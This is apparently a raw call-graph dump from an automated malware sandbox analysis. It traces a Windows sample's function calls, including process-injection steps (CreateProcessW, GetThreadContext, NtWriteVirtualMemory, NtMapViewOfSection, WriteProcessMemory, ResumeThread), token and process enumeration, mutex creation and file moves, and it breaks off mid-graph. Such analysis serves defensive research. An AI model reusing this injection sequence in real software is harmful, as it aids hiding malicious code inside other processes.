3166598 11355->11356 11357 316f0d9 8 API calls 11356->11357 11358 31665b1 11357->11358 11359 316f0d9 8 API calls 11358->11359 11360 31665ca 11359->11360 11361 316f0d9 8 API calls 11360->11361 11362 31665e3 11361->11362 11363 316f0d9 8 API calls 11362->11363 11364 31663a7 GetOEMCP 11363->11364 11365 316dfc2 11364->11365 11456 3168dc9 RtlAllocateHeap 11365->11456 11367 316dfdd 11368 316dfe8 GetCurrentProcessId 11367->11368 11408 316e33d 11367->11408 11369 316e000 11368->11369 11457 316ca0a 11369->11457 11371 316e064 11473 316f3a0 11371->11473 11372 316e053 11372->11371 11464 316ca5a 11372->11464 11377 316e099 11378 316e0e3 GetLastError 11377->11378 11379 316e0e9 GetSystemMetrics 11377->11379 11378->11379 11380 316e110 11379->11380 11482 316c85a 11380->11482 11386 316e14b 11499 316c870 11386->11499 11391 3168f63 memset 11392 316e1a2 GetVersionExA 11391->11392 11518 316ddbe 11392->11518 11396 316e1c0 GetWindowsDirectoryW 11397 3169f85 2 API calls 11396->11397 11398 316e1e3 11397->11398 11399 3168d9a 2 API calls 11398->11399 11400 316e21d 11399->11400 11402 316e255 11400->11402 11541 3169fe4 11400->11541 11524 317357b 11402->11524 11408->11338 11619 316d7cd 11409->11619 11412 316d9d5 11412->11340 11414 316d9ca 11416 3168ddf 2 API calls 11414->11416 11415 316d9b8 11415->11414 11417 3168ddf 2 API calls 11415->11417 11416->11412 11417->11415 11418 3168f63 memset 11423 316d8c6 11418->11423 11421 316d939 GetLastError 11649 316dadc ResumeThread 11421->11649 11423->11414 11423->11415 11423->11418 11423->11421 11424 316d963 FindCloseChangeNotification 11423->11424 11631 316be10 11423->11631 11636 316d9de 11423->11636 11424->11423 11719 316a79b 11425->11719 11428 31661f7 11428->11345 11429 316620f 11735 316601d 11429->11735 11435 3166272 11770 31660d9 11435->11770 11436 3166223 11438 3166277 11436->11438 11439 3166228 11436->11439 11440 3166270 11438->11440 11441 3166293 11438->11441 11783 3170ac8 11438->11783 11439->11441 11444 316b6e3 7 API calls 11439->11444 11804 31660bf 11440->11804 11441->11345 11445 3166248 11444->11445 11747 3165c8c 11445->11747 12967 3168dc9 RtlAllocateHeap 11449->12967 11451 316359e 11455 31635d5 11451->11455 12968 3168dc9 RtlAllocateHeap 11451->12968 11453 31635af 11454 31698d0 2 API calls 11453->11454 11453->11455 11454->11455 11455->11345 11456->11367 11458 316ca21 11457->11458 11459 316ca25 11458->11459 11545 316c9f3 11458->11545 11459->11372 11462 316ca36 11462->11372 11463 316ca4a FindCloseChangeNotification 11463->11462 11558 316c92f GetCurrentThread OpenThreadToken 11464->11558 11467 316c986 6 API calls 11472 316ca8e FindCloseChangeNotification 11467->11472 11469 316cb06 11471 3168ddf 2 API calls 11469->11471 11470 316cb10 11470->11371 11471->11470 11472->11469 11472->11470 11475 316f3bf 11473->11475 11474 316e08e 11477 316f365 11474->11477 11475->11474 11563 3169ab3 11475->11563 11478 316f37c 11477->11478 11479 316f39c 11478->11479 11480 3169ab3 RtlAllocateHeap 11478->11480 11479->11377 11481 316f389 11480->11481 11481->11377 11568 316c778 11482->11568 11484 316c86e 11485 316c64d 11484->11485 11486 316c668 11485->11486 11487 3169f6b 2 API calls 11486->11487 11488 316c672 11487->11488 11583 31736d5 11488->11583 11490 316c6bd 11491 3168d87 2 API calls 11490->11491 11492 316c6c9 11491->11492 11495 3169bd5 11492->11495 11493 316c687 11493->11490 11494 31736d5 2 API calls 11493->11494 11494->11493 11496 3169be1 MultiByteToWideChar 11495->11496 11497 3169bdc 11495->11497 11498 3169bf5 11496->11498 11497->11386 11498->11386 11500 3169f6b 2 API calls 11499->11500 11501 316c88b 11500->11501 11502 3169f6b 2 API calls 11501->11502 11504 316c89a 11502->11504 11503 316c92a 11512 316cbd7 11503->11512 11504->11503 11505 31736d5 2 API calls 11504->11505 11506 316c8eb 11504->11506 11505->11504 11507 31736d5 2 API calls 11506->11507 11508 316c916 11506->11508 11507->11506 11509 3168d87 2 API calls 11508->11509 11510 316c922 11509->11510 11511 3168d87 2 API calls 11510->11511 11511->11503 11513 316cbef 11512->11513 11514 316cbf3 11513->11514 11515 316c986 6 API calls 11513->11515 11514->11391 11517 316cc07 11515->11517 11516 3168ddf 2 API calls 11516->11514 11517->11514 11517->11516 11519 316dde4 11518->11519 11520 316ddd3 GetCurrentProcess IsWow64Process 11518->11520 11521 316dde7 11519->11521 11520->11519 11522 316ddf6 GetSystemInfo 11521->11522 11523 316ddf1 11521->11523 11522->11396 11523->11396 11525 3173586 11524->11525 11527 316e31e 11524->11527 11526 31736d5 2 API calls 11525->11526 11525->11527 11526->11525 11528 31698d0 11527->11528 11588 3169858 11528->11588 11531 316db68 11535 316dd4d 11531->11535 11532 3169f6b 2 API calls 11532->11535 11533 316dd7d 11594 316baf6 CreateToolhelp32Snapshot 11533->11594 11535->11532 11535->11533 11537 3168d87 2 API calls 11535->11537 11602 3169d29 11535->11602 11537->11535 11538 316dd99 11540 316ddb6 11538->11540 11608 3169e22 11538->11608 11540->11408 11542 3168f63 memset 11541->11542 11543 3169ff8 _vsnwprintf 11542->11543 11544 316a015 11543->11544 11544->11402 11548 316c986 GetTokenInformation 11545->11548 11549 316c9c5 11548->11549 11550 316c9a8 GetLastError 11548->11550 11549->11462 11549->11463 11550->11549 11551 316c9b3 11550->11551 11557 3168dc9 RtlAllocateHeap 11551->11557 11553 316c9bb 11553->11549 11554 316c9c9 GetTokenInformation 11553->11554 11554->11549 11555 316c9de 11554->11555 11556 3168ddf 2 API calls 11555->11556 11556->11549 11557->11553 11559 316c97c 11558->11559 11560 316c950 GetLastError 11558->11560 11559->11467 11559->11470 11560->11559 11561 316c95d OpenProcessToken 11560->11561 11561->11559 11564 3169abc 11563->11564 11566 3169ace 11563->11566 11567 3168dc9 RtlAllocateHeap 11564->11567 11566->11474 11567->11566 11569 3168f63 memset 11568->11569 11570 316c79a lstrcpynW 11569->11570 11572 3169f85 2 API calls 11570->11572 11573 316c7cf GetVolumeInformationW 11572->11573 11574 3168d9a 2 API calls 11573->11574 11575 316c804 11574->11575 11576 3169fe4 2 API calls 11575->11576 11577 316c825 lstrcatW 11576->11577 11581 316a5e9 11577->11581 11580 316c84b 11580->11484 11582 316a5f1 CharUpperBuffW 11581->11582 11582->11580 11584 31736e5 11583->11584 11585 3173718 lstrlenW 11584->11585 11586 3173735 _ftol2_sse 11585->11586 11586->11493 11589 3169868 11588->11589 11589->11589 11590 31736d5 2 API calls 11589->11590 11593 3169883 11590->11593 11591 31698b7 11591->11531 11592 31736d5 2 API calls 11592->11593 11593->11591 11593->11592 11595 316bb20 11594->11595 11596 316bb4b 11594->11596 11597 3168f63 memset 11595->11597 11596->11538 11598 316bb32 Process32First 11597->11598 11598->11596 11600 316bb59 11598->11600 11599 316bb7e FindCloseChangeNotification 11599->11596 11600->11599 11614 316daf2 11600->11614 11604 3169d3d 11602->11604 11617 3168dc9 RtlAllocateHeap 11604->11617 11605 3169e0c 11605->11535 11607 3169d95 11607->11605 11618 3168dc9 RtlAllocateHeap 11607->11618 11609 3169e6e 11608->11609 11613 3169e33 11608->11613 11609->11538 11610 3169e65 11612 3168ddf 2 API calls 11612->11613 11613->11609 11613->11610 11613->11612 11617->11607 11618->11607 11620 316d7e7 11619->11620 11650 3168dc9 RtlAllocateHeap 11620->11650 11622 316d81b 11623 3169f85 2 API calls 11622->11623 11624 316d878 11622->11624 11625 3168d9a 2 API calls 11622->11625 11626 3169ab3 RtlAllocateHeap 11622->11626 11623->11622 11624->11412 11627 316b6e3 11624->11627 11625->11622 11626->11622 11628 316b6fc 11627->11628 11651 316b632 11628->11651 11632 3168f63 memset 11631->11632 11633 316be26 11632->11633 11634 3168f63 memset 11633->11634 11635 316be33 CreateProcessW 11634->11635 11635->11423 11660 316d309 11636->11660 11643 3168f63 memset 11644 316da24 GetThreadContext 11643->11644 11645 316da4e NtProtectVirtualMemory 11644->11645 11647 316dace 11644->11647 11646 316da90 NtWriteVirtualMemory 11645->11646 11645->11647 11646->11647 11648 316daad NtProtectVirtualMemory 11646->11648 11707 316d47c 11647->11707 11648->11647 11649->11423 11650->11622 11652 317357b 2 API calls 11651->11652 11653 316b64a 11652->11653 11654 3169f6b 2 API calls 11653->11654 11655 316b674 11654->11655 11656 3169fa5 2 API calls 11655->11656 11657 316b6d2 11656->11657 11658 3168d87 2 API calls 11657->11658 11659 316b6dd 11658->11659 11659->11423 11661 316d337 11660->11661 11662 316d325 11660->11662 11664 3169f85 2 API calls 11661->11664 11662->11661 11663 316d464 11662->11663 11663->11647 11686 316d538 11663->11686 11665 316d344 11664->11665 11666 3169fe4 2 API calls 11665->11666 11667 316d37d 11666->11667 11668 3169f85 2 API calls 11667->11668 11669 316d39c 11668->11669 11712 3169c50 11669->11712 11672 3168d9a 2 API calls 11673 316d3c4 11672->11673 11674 3169c50 2 API calls 11673->11674 11675 316d3e7 LoadLibraryW 11674->11675 11677 316d412 11675->11677 11680 316d420 11675->11680 11678 316f08e 3 API calls 11677->11678 11678->11680 11679 3168ddf 2 API calls 11681 316d435 11679->11681 11680->11679 11682 3168f63 memset 11681->11682 11683 316d447 11682->11683 11683->11663 11684 3168ddf 2 API calls 11683->11684 11685 316d462 11684->11685 11685->11663 11687 316d56b 11686->11687 11688 316d58c NtCreateSection 11687->11688 11693 316d77f 11687->11693 11689 316d5b5 RegisterClassExA 11688->11689 11688->11693 11690 316d645 NtMapViewOfSection 11689->11690 11691 316d609 CreateWindowExA 11689->11691 11690->11693 11698 316d678 NtMapViewOfSection 11690->11698 11691->11690 11694 316d633 DestroyWindow UnregisterClassA 11691->11694 11692 316d7b4 11696 316d7bd NtClose 11692->11696 11697 316d7c8 11692->11697 11693->11692 11699 316d7b0 NtUnmapViewOfSection 11693->11699 11694->11690 11696->11697 11697->11643 11697->11647 11698->11693 11700 316d69c 11698->11700 11699->11692 11701 3168e2e RtlAllocateHeap 11700->11701 11702 316d6ac 11701->11702 11702->11693 11703 316d6bb VirtualAllocEx WriteProcessMemory 11702->11703 11704 3168ddf 2 API calls 11703->11704 11705 316d702 11704->11705 11706 316d765 lstrlenW 11705->11706 11706->11693 11708 316d485 FreeLibrary 11707->11708 11709 316d493 11707->11709 11708->11709 11710 3168ddf 2 API calls 11709->11710 11711 316d4b4 11709->11711 11710->11711 11711->11423 11713 3169c62 11712->11713 11718 3168dc9 RtlAllocateHeap 11713->11718 11715 3169c81 11716 3169c9e 11715->11716 11717 3169c8d lstrcatW 11715->11717 11716->11672 11717->11715 11718->11715 11808 316a7c6 11719->11808 11722 3170cd9 11872 3168dc9 RtlAllocateHeap 11722->11872 11724 3170ce0 11725 3170cea 11724->11725 11873 316b553 11724->11873 11725->11429 11728 3170d2e 11728->11429 11733 3170ac8 14 API calls 11734 3170d2b 11733->11734 11734->11429 11910 316ab83 11735->11910 11738 3166319 11739 316b6e3 7 API calls 11738->11739 11740 3166336 11739->11740 11741 3165c8c 10 API calls 11740->11741 11743 3166219 11740->11743 11742 3166370 11741->11742 11742->11743 11941 316ab69 11742->11941 11743->11435 11743->11436 11746 3166382 lstrcmpiW 11746->11743 11748 316b6e3 7 API calls 11747->11748 11749 3165ca5 11748->11749 11750 3169bfd 2 API calls 11749->11750 11751 3165cb2 11749->11751 11752 3165cd5 11750->11752 11945 316b270 11752->11945 11754 3165ce5 11755 3165d09 11754->11755 11758 316b270 2 API calls 11754->11758 11756 3168ddf 2 API calls 11755->11756 11757 3165d15 11756->11757 11759 316618c 11757->11759 11758->11755 11760 316ab69 4 API calls 11759->11760 11761 3166196 11760->11761 11762 31661a4 lstrcmpiW 11761->11762 11763 316619f 11761->11763 11764 31661d6 11762->11764 11765 31661ba 11762->11765 11763->11440 11767 3168ddf 2 API calls 11764->11767 11950 316ac61 11765->11950 11767->11763 11999 3168dc9 RtlAllocateHeap 11770->11999 11772 31660eb 11773 31660fe GetDriveTypeW 11772->11773 11774 316612f 11772->11774 11773->11774 12000 3162bee 11774->12000 11776 316614b 11777 3166169 11776->11777 12019 3165315 11776->12019 12072 316b162 11777->12072 11781 316b162 2 API calls 11782 3166185 11781->11782 11782->11438 11784 316109a 2 API calls 11783->11784 11785 3170ad7 11784->11785 12611 31667db memset 11785->12611 11788 3168d9a 2 API calls 11789 3170afd 11788->11789 11790 3170b76 11789->11790 12623 316aaff 11789->12623 11790->11440 11794 3170b28 11794->11790 11795 316109a 2 API calls 11794->11795 11796 3170b3a 11795->11796 11797 3169fe4 2 API calls 11796->11797 11798 3170b49 11797->11798 11799 316b787 2 API calls 11798->11799 11800 3170b5c 11799->11800 11801 3170b6a 11800->11801 12627 316af67 11800->12627 11803 3168ddf 2 API calls 11801->11803 11803->11790 11805 31660d1 11804->11805 12640 31659f4 11805->12640 11847 3168dc9 RtlAllocateHeap 11808->11847 11810 316a7f0 11834 31661f3 11810->11834 11848 316c5c6 11810->11848 11813 3169f6b 2 API calls 11814 316a830 11813->11814 11817 316a96e 11814->11817 11818 316a85c 11814->11818 11815 316a9bf 11816 3169bfd 2 API calls 11815->11816 11842 316a96a 11816->11842 11817->11815 11819 316a980 11817->11819 11818->11842 11858 3169bfd 11818->11858 11821 3169bfd 2 API calls 11819->11821 11819->11842 11820 3168d87 2 API calls 11823 316a9df 11820->11823 11821->11842 11824 3168ddf 2 API calls 11823->11824 11838 316aa3a 11823->11838 11825 316aa75 11824->11825 11826 3168f63 memset 11825->11826 11826->11838 11827 316a924 11833 3169bfd 2 API calls 11827->11833 11829 3169f85 2 API calls 11830 316a8c2 11829->11830 11832 3169c50 2 API calls 11830->11832 11831 3168ddf 2 API calls 11831->11834 11835 316a8d4 11832->11835 11836 316a94b 11833->11836 11834->11428 11834->11429 11834->11722 11837 3168d9a 2 API calls 11835->11837 11841 3168ddf 2 API calls 11836->11841 11839 316a8e2 11837->11839 11838->11831 11838->11838 11864 3169b26 11839->11864 11841->11842 11842->11820 11844 3168ddf 2 API calls 11845 316a919 11844->11845 11846 3168ddf 2 API calls 11845->11846 11846->11827 11847->11810 11849 316c5df 11848->11849 11850 31736d5 2 API calls 11849->11850 11851 316c5ef 11850->11851 11852 3169f6b 2 API calls 11851->11852 11853 316c5fe 11852->11853 11854 316c63a 11853->11854 11857 31736d5 2 API calls 11853->11857 11855 3168d87 2 API calls 11854->11855 11856 316a811 11855->11856 11856->11813 11857->11853 11859 3169c0f 11858->11859 11870 3168dc9 RtlAllocateHeap 11859->11870 11861 3169c2c 11862 3169c38 lstrcatA 11861->11862 11863 3169c49 11861->11863 11862->11861 11863->11823 11863->11827 11863->11829 11865 3169b2f 11864->11865 11866 3169b5c 11864->11866 11871 3168dc9 RtlAllocateHeap 11865->11871 11866->11844 11868 3169b41 11868->11866 11869 3169b49 MultiByteToWideChar 11868->11869 11869->11866 11870->11861 11871->11868 11872->11724 11874 316b564 11873->11874 11875 316b56b 11873->11875 11874->11728 11879 3170b84 11874->11879 11875->11874 11877 316b595 11875->11877 11904 3168dc9 RtlAllocateHeap 11875->11904 11877->11874 11878 3168ddf 2 API calls 11877->11878 11878->11874 11905 3168dc9 RtlAllocateHeap 11879->11905 11881 3170cd1 11900 316fb9c 11881->11900 11882 3170b97 11882->11881 11883 3170c86 11882->11883 11884 316109a 2 API calls 11882->11884 11886 3168ddf 2 API calls 11883->11886 11885 3170bcd 11884->11885 11887 3169f85 2 API calls 11885->11887 11886->11881 11888 3170bf1 11887->11888 11889 3169c50 2 API calls 11888->11889 11890 3170c0f 11889->11890 11891 316b553 3 API calls 11890->11891 11892 3170c1c 11891->11892 11893 3168d9a 2 API calls 11892->11893 11894 3170c28 11893->11894 11895 3168d9a 2 API calls 11894->11895 11898 3170c31 11895->11898 11896 3168ddf 2 API calls 11897 3170c7b 11896->11897 11899 3168ddf 2 API calls 11897->11899 11898->11896 11899->11883 11901 316fbc0 11900->11901 11906 3170485 11901->11906 11904->11877 11905->11882 11907 317049e 11906->11907 11908 31704bf lstrlenW 11907->11908 11909 316fbd2 11908->11909 11909->11733 11913 316ab93 11910->11913 11918 316acb3 11913->11918 11916 316602f 11916->11738 11917 3168ddf 2 API calls 11917->11916 11919 316acd5 11918->11919 11932 316a766 11919->11932 11921 316abac 11921->11916 11921->11917 11922 316acdf 11922->11921 11935 316ceb8 11922->11935 11924 316adac 11925 3168ddf 2 API calls 11924->11925 11925->11921 11926 316ad13 11926->11924 11927 3170485 lstrlenW 11926->11927 11928 316ad64 11927->11928 11929 316ad87 11928->11929 11931 3168e2e RtlAllocateHeap 11928->11931 11930 3168ddf 2 API calls 11929->11930 11930->11924 11931->11929 11939 3168dc9 RtlAllocateHeap 11932->11939 11934 316a772 11934->11922 11936 316cede 11935->11936 11938 316cee2 11936->11938 11940 3168dc9 RtlAllocateHeap 11936->11940 11938->11926 11939->11934 11940->11938 11942 316ab6e 11941->11942 11943 316acb3 4 API calls 11942->11943 11944 316637e 11943->11944 11944->11743 11944->11746 11946 316b27f 11945->11946 11949 316b27a 11945->11949 11947 316b296 GetLastError 11946->11947 11948 316b2a1 GetLastError 11946->11948 11947->11949 11948->11949 11949->11754 11966 316ac6f 11950->11966 11953 316c402 SetFileAttributesW 11954 3168f63 memset 11953->11954 11955 316c42f 11954->11955 11956 316c450 11955->11956 11957 31736d5 2 API calls 11955->11957 11956->11764 11958 316c46c 11957->11958 11959 3169fe4 2 API calls 11958->11959 11960 316c47d 11959->11960 11961 3169c50 2 API calls 11960->11961 11962 316c48e 11961->11962 11962->11956 11987 316c32f 11962->11987 11965 3168ddf 2 API calls 11965->11956 11967 316ac7f 11966->11967 11970 316adde 11967->11970 11971 31661cb 11970->11971 11972 316adfb 11970->11972 11971->11764 11971->11953 11972->11971 11973 31736d5 2 API calls 11972->11973 11974 316ae3f 11973->11974 11986 3168dc9 RtlAllocateHeap 11974->11986 11976 316ae53 11976->11971 11977 317357b 2 API calls 11976->11977 11978 316ae95 11977->11978 11979 3170485 lstrlenW 11978->11979 11980 316aed6 11979->11980 11981 316a766 RtlAllocateHeap 11980->11981 11984 316aee2 11981->11984 11982 316af4c 11983 3168ddf 2 API calls 11982->11983 11983->11971 11984->11982 11985 3168ddf 2 API calls 11984->11985 11985->11982 11986->11976 11988 316c352 11987->11988 11989 316c35a memset 11988->11989 11998 316c3c9 11988->11998 11990 3169f85 2 API calls 11989->11990 11991 316c376 11990->11991 11992 31736d5 2 API calls 11991->11992 11993 316c392 11992->11993 11994 3169fe4 2 API calls 11993->11994 11995 316c3a8 11994->11995 11996 3168d9a 2 API calls 11995->11996 11997 316c3b1 MoveFileW 11996->11997 11997->11998 11998->11965 11999->11772 12001 3161080 2 API calls 12000->12001 12002 3162c07 12001->12002 12080 316b330 12002->12080 12005 3168d87 2 API calls 12006 3162c2a 12005->12006 12007 3162c5a 12006->12007 12008 3161080 2 API calls 12006->12008 12007->11776 12009 3162c38 12008->12009 12090 3169124 12009->12090 12012 3168d87 2 API calls 12013 3162c56 12012->12013 12013->12007 12098 316b12f 12013->12098 12015 3162c70 12111 31694d4 12015->12111 12018 3168ddf 2 API calls 12018->12007 12196 316f1c7 12019->12196 12022 316c85a 9 API calls 12023 316533a 12022->12023 12024 316b6e3 7 API calls 12023->12024 12025 3165346 12024->12025 12209 316b222 12025->12209 12027 3165352 12028 316f0d9 8 API calls 12027->12028 12061 3165582 12027->12061 12029 3165371 12028->12029 12030 3169f85 2 API calls 12029->12030 12031 3165382 12030->12031 12032 3169c50 2 API calls 12031->12032 12033 316539b 12032->12033 12034 3168d9a 2 API calls 12033->12034 12036 31653ae 12034->12036 12035 31653c1 12038 3168ddf 2 API calls 12035->12038 12036->12035 12214 316b145 12036->12214 12039 31653d6 12038->12039 12220 316503f memset 12039->12220 12042 3168f63 memset 12044 316542e 12042->12044 12043 316558b 12045 3169f85 2 API calls 12043->12045 12276 316f323 12044->12276 12046 3165595 12045->12046 12048 3169c50 2 API calls 12046->12048 12053 31655ac 12048->12053 12049 31655dc 12050 3168d9a 2 API calls 12049->12050 12052 31655e8 lstrcpynW lstrcpynW 12050->12052 12055 316562d 12052->12055 12053->12049 12056 3168ddf 2 API calls 12053->12056 12054 31654af 12281 3168dc9 RtlAllocateHeap 12054->12281 12057 3168ddf 2 API calls 12055->12057 12056->12049 12058 316563f 12057->12058 12061->11777 12062 316550b 12062->12061 12063 3169f85 2 API calls 12062->12063 12073 316617d 12072->12073 12074 316b171 12072->12074 12073->11781 12075 316b196 12074->12075 12077 3168ddf 2 API calls 12074->12077 12076 3168ddf 2 API calls 12075->12076 12078 316b1a1 12076->12078 12077->12074 12079 3168ddf 2 API calls 12078->12079 12079->12073 12081 3169b26 2 API calls 12080->12081 12082 316b350 12081->12082 12083 31736d5 2 API calls 12082->12083 12085 316b39d 12082->12085 12084 316b36f FindResourceW 12083->12084 12084->12082 12084->12085 12086 3168ddf 2 API calls 12085->12086 12087 316b3a8 12086->12087 12088 3168e2e RtlAllocateHeap 12087->12088 12089 3162c1a 12087->12089 12088->12089 12089->12005 12091 3169133 12090->12091 12097 3162c47 12090->12097 12123 3168dc9 RtlAllocateHeap 12091->12123 12093 316913d 12093->12097 12124 3169029 12093->12124 12096 3168ddf 2 API calls 12096->12097 12097->12012 12099 3169124 4 API calls 12098->12099 12100 316b074 12099->12100 12101 316b13d 12100->12101 12167 31692a4 12100->12167 12101->12015 12105 316b08e 12106 316b120 12105->12106 12108 316b128 12105->12108 12109 3168e5d 3 API calls 12105->12109 12173 3169a76 12105->12173 12107 31694d4 6 API calls 12106->12107 12107->12108 12108->12015 12109->12105 12112 31694e3 12111->12112 12122 3162c7b 12111->12122 12113 316951d 12112->12113 12116 3168ddf 2 API calls 12112->12116 12112->12122 12114 316952d 12113->12114 12178 31695fb 12113->12178 12115 3169548 12114->12115 12118 3168ddf 2 API calls 12114->12118 12119 316955e 12115->12119 12120 3168ddf 2 API calls 12115->12120 12116->12112 12118->12115 12121 3168ddf 2 API calls 12119->12121 12120->12119 12121->12122 12122->12018 12123->12093 12138 3168dc9 RtlAllocateHeap 12124->12138 12126 316903e 12129 3169066 12126->12129 12137 316904b 12126->12137 12139 316957a 12126->12139 12127 31690ea 12130 3168ddf 2 API calls 12127->12130 12127->12137 12129->12127 12131 31690b4 12129->12131 12132 316957a lstrlenW 12129->12132 12130->12137 12131->12127 12131->12137 12143 316fd9c 12131->12143 12132->12131 12135 3169104 12136 3168ddf 2 API calls 12135->12136 12136->12137 12137->12096 12137->12097 12138->12126 12140 316959a 12139->12140 12141 3170485 lstrlenW 12140->12141 12142 31695be 12141->12142 12142->12129 12158 3168dc9 RtlAllocateHeap 12143->12158 12145 3168ddf 2 API calls 12148 316ff55 12145->12148 12146 316fdc0 12155 316ff2f 12146->12155 12159 3168dc9 RtlAllocateHeap 12146->12159 12150 3168ddf 2 API calls 12148->12150 12149 316fde0 12149->12155 12160 3168dc9 RtlAllocateHeap 12149->12160 12151 316ff63 12150->12151 12153 31690e3 12151->12153 12154 3168ddf 2 API calls 12151->12154 12153->12127 12153->12135 12154->12153 12155->12145 12156 316fdf4 12156->12155 12161 3168e5d 12156->12161 12158->12146 12159->12149 12160->12156 12166 3168dc9 RtlAllocateHeap 12161->12166 12163 3168e9a 12163->12156 12164 3168e72 12164->12163 12165 3168ddf 2 API calls 12164->12165 12165->12163 12166->12164 12170 31692c7 12167->12170 12168 3168dc9 RtlAllocateHeap 12168->12170 12169 31693fb 12172 3168dc9 RtlAllocateHeap 12169->12172 12170->12168 12170->12169 12171 3168ddf 2 API calls 12170->12171 12171->12170 12172->12105 12174 3169a81 12173->12174 12176 3169a97 12173->12176 12177 3168dc9 RtlAllocateHeap 12174->12177 12176->12105 12177->12176 12190 3168dc9 RtlAllocateHeap 12178->12190 12180 3169634 12181 3169667 12180->12181 12182 31696e5 12180->12182 12189 316963e 12180->12189 12191 3168fb1 12181->12191 12184 3170485 lstrlenW 12182->12184 12188 31696dd 12184->12188 12185 3169673 12186 3170485 lstrlenW 12185->12186 12186->12188 12187 3168ddf 2 API calls 12187->12189 12188->12187 12189->12114 12190->12180 12192 31736d5 2 API calls 12191->12192 12193 3168fca 12192->12193 12194 3168ff7 12193->12194 12195 31736d5 2 API calls 12193->12195 12194->12185 12195->12193 12197 316f1dd 12196->12197 12202 3165328 12196->12202 12198 3169f6b 2 API calls 12197->12198 12199 316f1e9 12198->12199 12200 3169f6b 2 API calls 12199->12200 12201 316f1f8 12200->12201 12201->12202 12203 316f205 GetModuleHandleA 12201->12203 12202->12022 12202->12061 12204 316f212 GetModuleHandleA 12203->12204 12205 316f219 12203->12205 12204->12205 12206 3168d87 2 API calls 12205->12206 12207 316f224 12206->12207 12208 3168d87 2 API calls 12207->12208 12208->12202 12210 316b236 12209->12210 12211 316b246 GetLastError 12210->12211 12212 316b23c GetLastError 12210->12212 12213 316b253 12211->12213 12212->12213 12213->12027 12289 3169183 12214->12289 12216 316b151 12217 316b157 12216->12217 12309 316b074 12216->12309 12217->12035 12221 3165075 12220->12221 12222 31650aa 12221->12222 12322 316308a 12221->12322 12224 316c85a 9 API calls 12222->12224 12228 316510f 12222->12228 12225 31650ba 12224->12225 12226 316c64d 6 API calls 12225->12226 12227 31650ca 12226->12227 12338 3164ffb 12227->12338 12228->12042 12228->12043 12555 316f233 12276->12555 12279 3165464 12279->12043 12279->12054 12280 316f233 39 API calls 12280->12279 12281->12062 12319 3168dc9 RtlAllocateHeap 12289->12319 12291 31691a4 12292 31691b5 lstrcpynW 12291->12292 12307 31691ae 12291->12307 12293 3169228 12292->12293 12294 31691d8 12292->12294 12320 3168dc9 RtlAllocateHeap 12293->12320 12295 316b553 3 API calls 12294->12295 12297 31691e4 12295->12297 12299 3169029 4 API calls 12297->12299 12302 316924d 12297->12302 12298 3169233 12301 3168ddf 2 API calls 12298->12301 12298->12302 12298->12307 12300 31691fe 12299->12300 12300->12298 12303 3169204 12300->12303 12301->12302 12304 3168ddf 2 API calls 12302->12304 12306 3169275 12302->12306 12308 3168ddf 2 API calls 12303->12308 12304->12306 12305 3168ddf 2 API calls 12305->12307 12306->12305 12307->12216 12308->12307 12310 31692a4 3 API calls 12309->12310 12311 316b087 12310->12311 12321 3168dc9 RtlAllocateHeap 12311->12321 12313 316b128 12313->12035 12314 316b120 12315 31694d4 6 API calls 12314->12315 12315->12313 12316 316b08e 12316->12313 12316->12314 12317 3168e5d 3 API calls 12316->12317 12318 3169a76 RtlAllocateHeap 12316->12318 12317->12316 12318->12316 12319->12291 12320->12298 12321->12316 12323 31630a6 12322->12323 12324 316109a 2 API calls 12323->12324 12337 3163141 12323->12337 12325 31630b9 12324->12325 12326 3169c50 2 API calls 12325->12326 12327 31630cb 12326->12327 12328 3168d9a 2 API calls 12327->12328 12329 31630d6 12328->12329 12330 316109a 2 API calls 12329->12330 12331 31630e0 12330->12331 12440 316cf54 12331->12440 12337->12222 12339 3169b26 2 API calls 12338->12339 12340 3165006 12339->12340 12341 3169f85 2 API calls 12340->12341 12342 3165015 12341->12342 12343 3169c50 2 API calls 12342->12343 12344 3165021 12343->12344 12345 3168d9a 2 API calls 12344->12345 12442 316cf81 12440->12442 12441 31630ee 12442->12441 12446 3168dc9 RtlAllocateHeap 12442->12446 12558 316f267 12555->12558 12556 316f26b 12556->12279 12556->12280 12558->12556 12560 3168dc9 RtlAllocateHeap 12558->12560 12561 3164f5b 12558->12561 12560->12558 12562 3164f7e 12561->12562 12563 3164feb 12562->12563 12564 316503f 34 API calls 12562->12564 12563->12558 12566 3164f9e 12564->12566 12565 3164fdc 12584 3164e19 12565->12584 12566->12563 12566->12565 12569 316bcc1 12566->12569 12570 316bce2 12569->12570 12582 316bcdb 12569->12582 12582->12566 12633 3168dc9 RtlAllocateHeap 12611->12633 12613 3166816 12614 3166987 12613->12614 12634 3168dc9 RtlAllocateHeap 12613->12634 12614->11788 12616 3166896 12617 3168ddf 2 API calls 12616->12617 12618 3166979 12617->12618 12619 3168ddf 2 API calls 12618->12619 12619->12614 12620 3168f63 memset 12621 3166830 12620->12621 12621->12614 12621->12616 12621->12620 12622 316c402 11 API calls 12621->12622 12622->12621 12635 316ab0e 12623->12635 12626 3168dc9 RtlAllocateHeap 12626->11794 12628 316af73 12627->12628 12629 316a766 RtlAllocateHeap 12628->12629 12631 316af9b 12629->12631 12630 316b000 12630->11801 12631->12630 12632 3168ddf 2 API calls 12631->12632 12632->12630 12633->12613 12634->12621 12636 316acb3 4 API calls 12635->12636 12637 316ab2d 12636->12637 12638 316ab0b 12637->12638 12639 3168ddf 2 API calls 12637->12639 12638->11790 12638->12626 12639->12638 12641 316aaff 4 API calls 12640->12641 12642 3165a05 12641->12642 12646 3165a67 12642->12646 12676 316b423 12642->12676 12645 316abf8 6 API calls 12647 3165a2b 12645->12647 12646->11441 12681 316f537 12647->12681 12650 316b6e3 7 API calls 12651 3165a49 12650->12651 12651->12646 12688 316a29b 12651->12688 12655 3165a7f 12706 3161486 CreateMutexW 12655->12706 12657 3165a84 12658 316a398 6 API calls 12657->12658 12659 3165a92 12658->12659 12721 31634f7 12659->12721 12677 316a1f8 GetSystemTimeAsFileTime 12676->12677 12678 316b42e 12677->12678 12679 316abc9 6 API calls 12678->12679 12680 3165a19 12679->12680 12680->12645 12682 316f0d9 8 API calls 12681->12682 12683 316f549 12682->12683 12684 316f0d9 8 API calls 12683->12684 12685 316f562 12684->12685 12785 316f4c6 12685->12785 12687 3165a32 12687->12650 12689 316a2ac 12688->12689 12690 3165a71 12689->12690 12799 3168dc9 RtlAllocateHeap 12689->12799 12692 316a398 12690->12692 12693 316a3b6 12692->12693 12694 316a40e 12693->12694 12702 316a3ba 12693->12702 12800 316a2ee 12693->12800 12695 316a41f 12694->12695 12806 3168dc9 RtlAllocateHeap 12694->12806 12697 316b222 2 API calls 